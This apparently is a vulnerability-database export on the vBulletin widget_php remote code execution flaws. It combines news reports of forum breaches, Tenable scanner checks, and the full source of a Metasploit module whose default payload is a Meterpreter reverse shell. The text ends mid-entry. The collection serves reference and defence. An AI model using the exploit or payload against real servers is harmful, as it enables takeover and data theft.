\n \nHowever, Comodo has not specified which of the two separate forums it owns was hacked. \n \nOne of the forums, \"forums.comodo.com,\" is hosted on Comodo's own sub-domain and is powered by different forum software, Simple Machines Forum, and appears not to be impacted. \n \nThe second forum, which runs on the vBulletin software and has likely been hacked, is ITarian Forum, hosted at \"forum.itarian.com,\" a discussion board where the company offers technical assistance to the users of its products. \n \n\n\n[](<https://thehackernews.com/images/-Rv1ReDGkeDk/XZM0KEdJyUI/AAAAAAAA1Sc/EzAerzwby9Ahun_vlQ2OzU-A8Ao6DkNAACLcBGAsYHQ/s728-e100/Comodo-vbulletin-forums-hacked.png>)\n\n \n\n\n## What Type of Information Was Accessed?\n\n \nThe breached database contains forum users' information, including: \n \n\n\n * Login username\n * Name\n * Email address\n * Hashed passwords\n * Last IP address used to access the forums\n * Some social media usernames in very limited situations.\n \nThe company became aware of the security breach over the weekend, on the morning of September 29, which suggests users registered on Comodo Forums until this Sunday are impacted by the breach. \n \n\n\n> \"Very recently a new vulnerability in the vBulletin software, which is one of the most popular server applications for website comments including the Comodo Forums, was made public,\" the company says.\n\n \n\n\n> \"Over the weekend at 4:57 am ET on Sunday, September 29, 2019, we became aware that this security flaw in the vBulletin software had become exploited resulting in a potential data breach on the Comodo Forums.\"\n\n \nImmediately after detecting the security intrusion, the Comodo IT infrastructure team took the forums offline in an attempt to mitigate the vBulletin exploit and applied the recommended security patches.
\n \n\n\n## What Users Should Do Now?\n\n \nIf you have registered with Comodo Forums on or before September 29, you are highly recommended to immediately change the password for your forum account to a strong and unique one and for any other online account where you use the same credentials. \n \nAlthough the account passwords were hashed in vBulletin for the Comodo Forum users, Comodo advises users to change their passwords as part of good password practices. \n \n\n\n> \"We deeply regret any inconvenience or distress this vulnerability may have caused you, our users,\" the company says. \n \n\"As members of our community of Comodo Forum users, we want to reassure you that we have put in place measures to ensure that vulnerabilities in third-party software, such as vBulletin, will be patched immediately when patches become available.\"\n\n \nBesides this, at the time of writing, the company has also temporarily disabled the registration for new users on the affected forums, The Hacker News confirmed.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-01T11:23:00", "type": "thn", "title": "Comodo Forums Hack Exposes 245,000 Users' Data \u2014 Recent vBulletin 0-day Used", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 
"accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-10-01T11:39:49", "id": "THN:86C3930A6E4C818EFA5133059C21FA57", "href": "https://thehackernews.com/2019/10/Comodo-vbulletin-hacked.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:58", "description": "[](<https://thehackernews.com/images/-lO6J7aRP7a0/Xcl7h55teFI/AAAAAAAA1sA/jJrdfv_1UhMsLLsIeb5fAzEzTxxNiWV1wCLcBGAsYHQ/s728-e100/ZoneAlarm-forum-data-breach.png>)\n\nZoneAlarm, an internet security software company owned by Israeli cybersecurity firm Check Point Technologies, has suffered a data breach exposing data of its discussion forum users, the company confirmed to The Hacker News. \n \nWith nearly 100 million downloads, ZoneAlarm offers antivirus software, firewall, and additional virus protection solutions to home PC users, small businesses, and mobile phones worldwide. \n \nThough neither ZoneAlarm nor its parent company Check Point has yet publicly disclosed the security incident, the company quietly sent an alert via email to all affected users over this weekend, The Hacker News learned. \n \nThe email-based breach notification advised ZoneAlarm forum users to immediately change their forum account passwords, informing them that hackers had gained unauthorized access to their names, email addresses, hashed passwords, and dates of birth. \n \nMoreover, the company has also clarified that the security incident only affects users registered with the \"**forums.zonealarm.com**\" domain, which has a small number of subscribers, nearly 4,500. \n \n\"This [forum] is a separate website from any other website we have and used only by a small number of subscribers who registered to this specific forum,\" the email notification reads. \n \n\"The website became inactive in order to fix the problem and will resume as soon as it is fixed. 
You will be requested to reset your password once joining the forum.\" \n \n\n\n## Hackers Exploited Recent vBulletin 0-Day Flaw\n\n \nUpon reaching out to the company, a spokesperson confirmed The Hacker News that attackers exploited a known critical RCE vulnerability ([CVE-2019-16759](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>)) in the vBulletin forum software to compromise ZoneAlarm's website and gain unauthorized access. \n \nFor those unaware, this flaw affected vBulletin versions 5.0.0 up to the latest 5.5.4, for which the project maintainers later released patch updates, but only for recent versions 5.5.2, 5.5.3, and 5.5.4. \n\n\n[](<https://thehackernews.com/images/-F7r0_5rBLkw/Xcl8ZDReWLI/AAAAAAAA1sI/0sC52j9ADsA7FkGqpPKB1-VZ3YYnbiENACLcBGAsYHQ/s728-e100/ZoneAlarm-forum.png>)\n\nThe Hacker News found that, surprisingly, the security company itself was running an outdated 5.4.4 version of the vBulletin software until last week that let attackers compromise the website easily. \n \nIt's the same [then-zero-day vBulletin exploit](<https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html>) that an anonymous hacker publicly disclosed in late September this year, which, if exploited, could allow remote attackers to take full control over unpatched vBulletin installations. \n \nMoreover, a week after that, the same flaw was also exploited by unknown attackers to [hack the Comodo forum](<https://thehackernews.com/2019/10/Comodo-vbulletin-hacked.html>) website, which exposed login account information of over nearly 245,000 Comodo Forums users. \n \nThough the ZoneAlarm team learned about the breach just late last week and immediately informed affected users, it's unclear exactly when the attackers breached the website. 
\n\n\n[](<https://thehackernews.com/images/-HiAbp0IFtFU/XcmB5MYkaTI/AAAAAAAA1sU/3JZWoSzyWk8_KuSaH4s-ls9SE6qWJWjawCLcBGAsYHQ/s728-e100/ZoneAlarm-hacked.png>)\n\n\"ZoneAlarm is conducting an investigation into the matter. We take pride in the fact that we took a proactive approach once this incident was detected and within 24 hours and alerted the forum members,\" the company's spokesperson told the Hacker News. \n \nSince the ZoneAlarm forum website is down at the time of writing, users would not be able to change their account password on the forum at this moment. \n \nBut if you are one of the affected users, you are also recommended to change your passwords for any other online account where you use the same credentials, and do the same for the ZoneForum website as soon as the site goes live again. \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-11T15:27:00", "type": "thn", "title": "Hackers Breach ZoneAlarm's Forum Site \u2014 Outdated vBulletin to Blame", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-11-11T15:44:48", "id": "THN:DA6A48C093F31D7EE1BB90D7EE577177", "href": "https://thehackernews.com/2019/11/zonealarm-forum-data-breach.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:44", "description": "An anonymous hacker today publicly revealed details and proof-of-concept exploit code for an unpatched, critical zero-day remote code execution vulnerability in vBulletin\u2014one of the most widely used internet forum software packages, The Hacker News has learned. \n \nThe vulnerability should be viewed as a severe issue not just because it is remotely exploitable, but also because it doesn't require authentication. \n \nWritten in PHP, vBulletin is a widely used proprietary Internet forum software package that powers more than 100,000 websites on the Internet, including the websites and forums of Fortune 500 and Alexa Top 1 million companies. \n \nAccording to details [published](<https://seclists.org/fulldisclosure/2019/Sep/31>) on the Full Disclosure mailing list, the hacker claims to have found a remote code execution vulnerability that appears to affect vBulletin versions 5.0.0 through the latest 5.5.4. \n \nThe Hacker News has independently verified that the flaw works as described and affects the latest version of the vBulletin software, which leaves thousands of forum websites at risk of hacking. 
\n \nThe vulnerability resides in the way an internal widget file of the forum software package accepts configuration via URL parameters and then parses it on the server without proper safety checks, allowing attackers to inject commands and remotely execute code on the system. \n \nAs a proof-of-concept, the hacker has also released a Python-based exploit that could make it easier for anyone to exploit the zero-day in the wild. \n \nSo far, no Common Vulnerabilities and Exposures (CVE) number has been assigned to the vulnerability. \n \nThe Hacker News has also informed the vBulletin project maintainers about the vulnerability disclosure and expects them to patch the security issue before hackers start exploiting it to target vBulletin installations. \n \nA separate cybersecurity researcher analyzed the [core reason of this vulnerability](<https://gist.github.com/jamesbercegay/a8f169059c6184e76b12d98d887542b3>) and posted details soon after The Hacker News published the article. \n \nMeanwhile, a GitHub user also released a [simple script](<https://github.com/Frint0/mass-pwn-vbulletin>) that could let anyone scan the Internet for vBulletin websites using the Shodan search engine and automatically check for vulnerable sites. \n \nWe will update the article and inform readers via social media as soon as we hear back from the vBulletin maintainers. \n \n\n\n## Update \u2014 Hackers Actively Exploiting vBulletin Zero-Day; Patches Now Available\n\n \nAccording to multiple infosec community sources in contact with The Hacker News, various hacking groups and individual bug hunters have already started scanning the Internet to target vulnerable vBulletin websites. 
\n \nAfter The Hacker News broke the news and informed the vBulletin team about the zero-day public disclosure, now tracked as CVE-2019-16759, the project maintainers today released [security patches for vBulletin](<https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4422707-vbulletin-security-patch-released-versions-5-5-2-5-5-3-and-5-5-4?patch>) versions 5.5.2, 5.5.3, and 5.5.4.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-24T18:57:00", "type": "thn", "title": "[Unpatched] Critical 0-Day RCE Exploit for vBulletin Forum Disclosed Publicly", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2019-09-26T06:48:12", "id": "THN:3C66A5BF1D6CB09FB0A4CEB90614BEC0", "href": "https://thehackernews.com/2019/09/vbulletin-zero-day-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2022-11-04T02:56:50", "description": "This module exploits a logic bug within the template rendering code in vBulletin 5.x. 
The module uses the vBulletin template rendering functionality to render the 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument. This causes the former template to load the latter bypassing filters originally put in place to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input allowing the module to achieve PHP remote code execution on the target. This module has been tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-09T22:38:52", "type": "metasploit", "title": "vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2021-05-13T03:01:03", "id": "MSF:EXPLOIT-MULTI-HTTP-VBULLETIN_WIDGET_TEMPLATE_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_widget_template_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: 
https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n prepend Msf::Exploit::Remote::AutoCheck\n\n HttpFingerprint = { method: 'GET', uri: '/', pattern: [/vBulletin.version = '5.+'/] }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.',\n 'Description' => %q{\n This module exploits a logic bug within the template rendering code in vBulletin 5.x.\n The module uses the vBulletin template rendering functionality to render the\n 'widget_tabbedcontainer_tab_panel' template while also providing the 'widget_php' argument.\n This causes the former template to load the latter bypassing filters originally put in place\n to address 'CVE-2019-16759'. This also allows the exploit to reach an eval call with user input\n allowing the module to achieve PHP remote code execution on the target. 
This module has been\n tested successfully on vBulletin version 5.6.2 on Ubuntu Linux.\n },\n 'Author' => [\n 'Zenofex <zenofex[at]exploitee.rs>' # (@zenofex) PoC and Metasploit module\n ],\n 'References' => [\n ['URL', 'https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/'],\n ['CVE', '2020-17496']\n ],\n 'DisclosureDate' => '2020-08-09',\n 'License' => MSF_LICENSE,\n 'Platform' => ['php', 'unix', 'windows'],\n 'Arch' => [ARCH_CMD, ARCH_PHP],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Meterpreter (PHP In-Memory)',\n {\n 'Platform' => 'php',\n 'Arch' => [ARCH_PHP],\n 'Type' => :php_memory,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'php/meterpreter/reverse_tcp',\n 'DisablePayloadHandler' => false\n }\n }\n ],\n [\n 'Unix (CMD In-Memory)',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/generic',\n 'DisablePayloadHandler' => true\n }\n }\n ],\n [\n 'Windows (CMD In-Memory)',\n {\n 'Platform' => 'windows',\n 'Arch' => ARCH_CMD,\n 'Type' => :windows_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/windows/generic',\n 'DisablePayloadHandler' => true\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the vBulletin base path', '/']),\n OptEnum.new('PHP_CMD', [true, 'Specify the PHP function in which you want to execute the payload.', 'shell_exec', ['shell_exec', 'exec']])\n ])\n end\n\n def cmd_payload(command)\n \"echo #{datastore['PHP_CMD']}(base64_decode('#{Rex::Text.encode_base64(command)}')); exit;\"\n end\n\n def execute_command(command)\n response = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ajax/render/widget_tabbedcontainer_tab_panel'),\n 'encode_params' => true,\n 'vars_post' => {\n 'subWidgets[0][template]' => 'widget_php',\n 
'subWidgets[0][config][code]' => command\n }\n })\n if response && response.body\n return response\n end\n\n false\n end\n\n def check\n rand_str = Rex::Text.rand_text_alpha(8)\n received = execute_command(cmd_payload(\"echo #{rand_str}\"))\n if received && received.body.include?(rand_str)\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n def exploit\n print_status(\"Sending #{datastore['PAYLOAD']} command payload\")\n case target['Type']\n when :unix_cmd, :windows_cmd\n cmd = cmd_payload(payload.encoded)\n vprint_status(\"Generated command payload: #{cmd}\")\n\n received = execute_command(cmd)\n if received && (datastore['PAYLOAD'] == \"cmd/#{target['Platform']}/generic\")\n print_warning('Dumping command output in body response')\n if received.body.empty?\n print_error('Empty response, no command output')\n return\n end\n print_line(received.body.to_s)\n end\n\n when :php_memory\n vprint_status(\"Generated command payload: #{payload.encoded}\")\n execute_command(payload.encoded)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/vbulletin_widget_template_rce.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-01-15T15:19:43", "description": "The version of vBulletin running on the remote host is affected by an input-validation flaw in the 'widgetConfig' parameter to the script 'ajax/render/widget_php' that allows command execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-23T00:00:00", "type": "nessus", "title": 
"vBulletin 'widget_php' Command Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:vbulletin:vbulletin"], "id": "VBULLETIN_WIDGET_PHP_CMD_EXEC.NASL", "href": "https://www.tenable.com/plugins/nessus/130168", "sourceData": "#%NASL_MIN_LEVEL 70300\n# \n# (C) Tenable Network Security, Inc. \n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130168);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2019-16759\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"vBulletin 'widget_php' Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has a\ncommand execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an\ninput-validation flaw in the 'widgetConfig' parameter to the script\n'ajax/render/widget_php' that allows command execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://seclists.org/fulldisclosure/2019/Sep/31\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vBulletin 5.5.4 P1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-16759\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'vBulletin widgetConfig RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/09/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/render/widget_php';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'widgetConfig[code]=echo pi();',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded'),\n port:port,\n exit_on_fail:TRUE\n);\n\nif (\"3.14159265358\" >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"vBulletin\", build_url(port:port,qs:dir));\n\npi_pos = stridx(res[2], \"3.14159265358\");\nres_proof = substr(res[2], pi_pos - 100, pi_pos + 100);\n\nreport = get_vuln_report(\n items:http_last_sent_request(),\n port:port,\n trailer:'\\n' +\n 'The above request resulted in the following output :' +\n '\\n\\n' +\n res_proof\n);\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:28:10", "description": "The instance of vBulletin running on the remote host is affected by a command execution vulnerability. A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to execute commands on the remote host. 
All versions of vBulletin prior to the 5.6.x branch are considered vulnerable.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-10-17T00:00:00", "type": "nessus", "title": "vBulletin < 5.6.2 Patch Level 1 Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2021-09-07T00:00:00", "cpe": ["cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98764", "href": "https://www.tenable.com/plugins/was/98764", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-15T14:53:42", "description": "The version of vBulletin running on the remote host is affected by an input-validation flaw in the ajax/render/widget_php API that allows for remote code execution. 
This plugin tests for a bypass to the fix for CVE-2019-16759.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-10T00:00:00", "type": "nessus", "title": "vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-16759", "CVE-2020-17496"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:vbulletin:vbulletin"], "id": "VBULLETIN_CVE-2019-16759_BYPASS_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/139457", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(139457);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-16759\", \"CVE-2020-17496\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0092\");\n\n script_name(english:\"vBulletin CVE-2019-16759 Bypass Remote Code Execution (CVE-2020-17496) (direct 
check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an input-validation flaw in the\najax/render/widget_php API that allows for remote code execution. This plugin tests for a bypass to the fix for\nCVE-2019-16759.\");\n # https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?62dedb88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP widgets or contact the vendor.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-17496\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution.');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n 